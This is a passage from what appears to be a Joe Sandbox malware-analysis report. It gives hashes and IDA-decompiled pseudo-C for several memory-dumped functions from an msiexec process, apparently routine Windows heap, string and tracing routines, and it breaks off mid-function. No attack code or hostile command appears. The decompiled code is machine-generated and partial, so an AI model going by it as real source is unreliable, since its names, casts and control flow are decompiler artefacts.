                              0x04d3a6ea
                              0x00000000
                              0x04d3a6ea
                              0x04d3a688
                              0x04d3a692
                              0x04d3a694
                              0x04d3a699
                              0x00000000
                              0x00000000
                              0x04d3a69d
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6611954738ff7e77f524d8a04d0fe65d15debddc540868cee2d4c674f1ffefb
                              • Instruction ID: 8b84d783fe6847dd26803b2586dc90d0d7ed839a2d6e48b96f8d865a93d94589
                              • Opcode Fuzzy Hash: b6611954738ff7e77f524d8a04d0fe65d15debddc540868cee2d4c674f1ffefb
                              • Instruction Fuzzy Hash: D64147B5B00215DFDB25CF58D9A0B99BBF1FB49305F1980A9E844AB345D778BD01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D87016 Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E04D87016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4dfd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04D86B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04D86B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04D27D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04D49AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04D4B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04D24620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                              0x04d87016
                              0x04d8701e
                              0x04d8702b
                              0x04d87033
                              0x04d87037
                              0x04d8703c
                              0x04d8703e
                              0x04d87041
                              0x04d87045
                              0x04d8704a
                              0x04d87050
                              0x04d87055
                              0x04d8705a
                              0x04d87062
                              0x04d87062
                              0x04d8705a
                              0x04d87064
                              0x04d87064
                              0x04d87067
                              0x04d87071
                              0x04d87096
                              0x04d8709b
                              0x04d870a2
                              0x04d870a6
                              0x04d870a7
                              0x04d870ad
                              0x04d870b3
                              0x04d870b6
                              0x04d870bb
                              0x04d870c3
                              0x04d870c3
                              0x04d870c6
                              0x04d870cd
                              0x04d870dd
                              0x04d870e0
                              0x04d870e2
                              0x04d870e2
                              0x04d870ee
                              0x04d87101
                              0x04d870f0
                              0x04d870f9
                              0x04d870f9
                              0x04d8710a
                              0x04d8710e
                              0x04d87112
                              0x04d87117
                              0x04d87118
                              0x04d87118
                              0x04d870bb
                              0x04d8711d
                              0x04d87123
                              0x04d87131
                              0x04d87131
                              0x04d87136
                              0x04d8713d
                              0x04d8713e
                              0x04d8713f
                              0x04d8714a
                              0x04d8714a
                              0x04d87084
                              0x04d87088
                              0x00000000
                              0x04d8708e
                              0x04d8708e
                              0x04d87092
                              0x00000000
                              0x04d87092

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
                              • Instruction ID: 90e677e94a275b6ff492a520c291cd34a334b1e143bec1fe5dc89521eff2cdde
                              • Opcode Fuzzy Hash: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
                              • Instruction Fuzzy Hash: B1317E726047519BC320EF68CD41A7AB7E9FF88704F144A2DF8959B690E734F904CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2C182 Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E04D2C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04D27D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04DD8D34(_v8, _t80);
					}
					E04D22280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04D1FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04DD8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04D1FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04D4B180();
						if(_a4 != 0) {
							E04D22280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04D2BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04D2BB2D(_t16, _t15);
						E04D2B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04D1FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04D1FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04D1FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                              0x04d2c18d
                              0x04d2c18f
                              0x04d2c191
                              0x04d2c19b
                              0x04d2c1a0
                              0x04d2c1d4
                              0x04d2c1de
                              0x04d72d6e
                              0x04d2c1e4
                              0x04d2c1e4
                              0x04d2c1e4
                              0x04d2c1ec
                              0x04d72d7d
                              0x04d72d7d
                              0x04d2c1f3
                              0x04d2c1ff
                              0x04d72d88
                              0x04d72d8d
                              0x04d72d94
                              0x04d72d94
                              0x04d72d9f
                              0x04d72da4
                              0x04d72dab
                              0x04d72db0
                              0x04d72db2
                              0x04d72db3
                              0x04d72db4
                              0x04d72dbc
                              0x04d72dc3
                              0x04d72dc3
                              0x04d2c205
                              0x04d2c205
                              0x04d2c208
                              0x04d2c20e
                              0x04d2c211
                              0x04d2c216
                              0x04d2c219
                              0x04d2c21f
                              0x04d2c222
                              0x04d2c22c
                              0x04d2c234
                              0x04d2c23a
                              0x04d2c23f
                              0x04d2c245
                              0x04d2c24b
                              0x04d2c251
                              0x04d2c25a
                              0x04d2c276
                              0x04d2c27d
                              0x04d2c27d
                              0x04d2c25c
                              0x04d2c25c
                              0x00000000
                              0x04d2c25e
                              0x04d2c1a4
                              0x04d2c1aa
                              0x04d2c1b3
                              0x04d2c265
                              0x04d2c26c
                              0x04d2c26c
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction ID: 3292ed72b37295239a81527db604da713f9063a9f9e589b7dafcf418baf5cd13
                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction Fuzzy Hash: C5312171B01596BAE705EBB0C580BEDF7A4FF6220CF08815AD51C97201EB74BA09DBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3A70E Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E04D3A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4df7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4df7b10 = 8;
					 *0x4df7b14 = 0x4df7b0c;
					 *0x4df7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04D3A990(0x4df7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04D3A840(__edx, __ecx, __ecx, _t52, 0x4df7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4df7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4df7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4df7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04D24620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4df7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04D4F3E0(_t50,  *0x4df7b14, _t8 >> 3);
						_t28 =  *0x4df7b14; // 0x771c7b0c
						__eflags = _t28 - 0x4df7b0c;
						if(_t28 != 0x4df7b0c) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4df7b14 = _t50;
						_t48 = _v12;
						 *0x4df7b10 = _t9;
						goto L6;
					}
					 *0x4df7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                              0x04d3a713
                              0x04d3a714
                              0x04d3a717
                              0x04d3a71d
                              0x04d3a720
                              0x04d3a722
                              0x04d3a727
                              0x04d3a74a
                              0x04d3a754
                              0x04d3a75e
                              0x04d3a768
                              0x04d3a76a
                              0x04d3a773
                              0x04d3a78b
                              0x04d3a790
                              0x04d3a792
                              0x04d3a741
                              0x04d3a741
                              0x04d3a743
                              0x04d3a749
                              0x04d3a749
                              0x04d3a732
                              0x04d3a73a
                              0x04d3a797
                              0x04d3a79d
                              0x04d3a7a3
                              0x04d3a7a9
                              0x04d3a7b6
                              0x04d3a7bc
                              0x04d3a7ca
                              0x04d3a7e0
                              0x04d3a7e2
                              0x04d3a7e4
                              0x04d79bf2
                              0x00000000
                              0x04d79bf2
                              0x04d3a7ed
                              0x04d3a7f2
                              0x04d3a800
                              0x04d3a805
                              0x04d3a80d
                              0x04d3a812
                              0x04d79c08
                              0x04d79c08
                              0x04d3a818
                              0x04d3a81b
                              0x04d3a821
                              0x04d3a824
                              0x00000000
                              0x04d3a824
                              0x04d3a7ae
                              0x00000000
                              0x04d3a7ae
                              0x04d3a73c
                              0x04d3a73e
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc73d836e8ebcda197616087bbf2e5e995a3897ddd22436936ae9d48838f6573
                              • Instruction ID: 8b402100ccaeb61d7fe2320634b093f8af66f042e0a31c4ea869e13db49de739
                              • Opcode Fuzzy Hash: fc73d836e8ebcda197616087bbf2e5e995a3897ddd22436936ae9d48838f6573
                              • Instruction Fuzzy Hash: C031ADB1720201ABD721CF18D8A0FA977F9FB86714F15096AE18597340E7B8BD01CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D361A0 Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E04D361A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04D35E50(0x4ce67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04DD9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04D0F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                              0x04d361b3
                              0x04d361b5
                              0x04d361bd
                              0x04d361c3
                              0x04d361c7
                              0x04d361d2
                              0x04d361ff
                              0x04d361ff
                              0x04d36201
                              0x04d36207
                              0x04d36207
                              0x04d361d4
                              0x04d361d9
                              0x00000000
                              0x00000000
                              0x04d361df
                              0x04d361e2
                              0x00000000
                              0x00000000
                              0x04d361e6
                              0x04d361e8
                              0x04d361ee
                              0x04d361ee
                              0x04d361f9
                              0x04d7762f
                              0x04d77632
                              0x04d77635
                              0x04d77639
                              0x04d77640
                              0x04d7766e
                              0x04d77675
                              0x00000000
                              0x00000000
                              0x04d77681
                              0x04d77689
                              0x04d7768d
                              0x04d77691
                              0x04d77695
                              0x04d77699
                              0x04d776af
                              0x04d776b5
                              0x04d776b7
                              0x04d776b7
                              0x04d776d7
                              0x04d776dc
                              0x00000000
                              0x04d776dc
                              0x04d776a2
                              0x04d776a9
                              0x04d77651
                              0x04d77653
                              0x04d77653
                              0x04d77656
                              0x04d77656
                              0x00000000
                              0x04d77656
                              0x04d77644
                              0x04d77646
                              0x04d77648
                              0x04d77648
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7662b0f5c916c21c1e01ecd52a639d826d18cf3d5496b219cb1c0f6b7ae5ab9
                              • Instruction ID: 6fd63f3a1201fd282bad0aa5de962cbbbb98ad83daf7d638b1baeed6c2c58262
                              • Opcode Fuzzy Hash: a7662b0f5c916c21c1e01ecd52a639d826d18cf3d5496b219cb1c0f6b7ae5ab9
                              • Instruction Fuzzy Hash: 6B318B726093019FD360DF19C840B2AB7E5FB88B04F05496DE9989B361E7B0F804CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0AA16 Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E04D0AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4dfd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4df7b9c; // 0x0
					_t53 = L04D24620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04D4B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04D4F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04D16C59(_t53, _t51, _t58) != 0) {
							_t28 = E04D35E50(0x4cec338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04D3B230(_v32, _v28, 0x4cec2d8, 1,  &_v24);
								_t28 = E04D0F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                              0x04d0aa25
                              0x04d0aa29
                              0x04d0aa2d
                              0x04d0aa30
                              0x04d0aa37
                              0x04d0aa3c
                              0x04d64458
                              0x04d64458
                              0x04d64472
                              0x04d64474
                              0x04d64476
                              0x04d0aa64
                              0x04d0aa74
                              0x04d6447c
                              0x04d64483
                              0x04d64492
                              0x04d0aa52
                              0x04d0aa54
                              0x04d0aa5e
                              0x04d644a8
                              0x04d644ad
                              0x04d644af
                              0x04d644b6
                              0x04d644b6
                              0x04d644b9
                              0x04d644bc
                              0x04d644cd
                              0x04d644d3
                              0x04d644d6
                              0x04d644e1
                              0x04d644e1
                              0x04d644e6
                              0x04d644e8
                              0x04d644fb
                              0x04d644fb
                              0x04d644e8
                              0x00000000
                              0x04d0aa5e
                              0x04d64476
                              0x04d0aa42
                              0x04d0aa46
                              0x04d0aa48
                              0x04d0aa4c
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b58f74edd988c0a0ee38e2e95cef39c46b814d3a47638cd45099da75a44bf607
                              • Instruction ID: 59a5afd8998e53942e5328871c0450d2932c2dfdf2681516cb05140b8b5a87ec
                              • Opcode Fuzzy Hash: b58f74edd988c0a0ee38e2e95cef39c46b814d3a47638cd45099da75a44bf607
                              • Instruction Fuzzy Hash: D431B171A00219ABDF149F64CD41ABFB7B9FF44704B01446AF902EB290E774B911DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D48EC7 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E04D48EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4dfd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04D34E70(0x4df86e4, 0x4d49490, 0, 0);
					if( *0x4df53e8 > 5 && E04D48F33(0x4df53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4df53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4df53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4cebc46;
						_t48 = E04D87B9C(0x4df53e8, 0x4cebc46, _t67, 0x4df53e8, _t70,  &_v140);
					}
				}
				return E04D4B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                              0x04d48ec7
                              0x04d48ed9
                              0x04d48edc
                              0x04d48ee6
                              0x04d48ee9
                              0x04d48eee
                              0x04d48efc
                              0x04d48f08
                              0x04d81349
                              0x04d81353
                              0x04d8135d
                              0x04d81366
                              0x04d8136f
                              0x04d81375
                              0x04d8137c
                              0x04d81385
                              0x04d81390
                              0x04d81391
                              0x04d8139c
                              0x04d8139d
                              0x04d813a6
                              0x04d813ac
                              0x04d813b2
                              0x04d813b5
                              0x04d813bc
                              0x04d813bf
                              0x04d813c2
                              0x04d813c5
                              0x04d813c8
                              0x04d813cb
                              0x04d813ce
                              0x04d813d1
                              0x04d813d4
                              0x04d813d7
                              0x04d813da
                              0x04d813dd
                              0x04d813e0
                              0x04d813e3
                              0x04d813e6
                              0x04d813e9
                              0x04d813f6
                              0x04d81400
                              0x04d81400
                              0x04d48f08
                              0x04d48f32

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f51df401e1fe8809c24c595d77c55060fc7d09088c4b62b302a3ed2e72356e2c
                              • Instruction ID: b31634b4ef61796febc26880f016c1041d8f5e344a9a5edd7b42217ca42993ca
                              • Opcode Fuzzy Hash: f51df401e1fe8809c24c595d77c55060fc7d09088c4b62b302a3ed2e72356e2c
                              • Instruction Fuzzy Hash: CE41A2B1D003189FDB20DFAAD980AADFBF4FB48314F5041AEE549A7200E774AA44CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D44A2C Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E04D44A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4dfd360 ^ _t62;
				_v8 =  *0x4dfd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
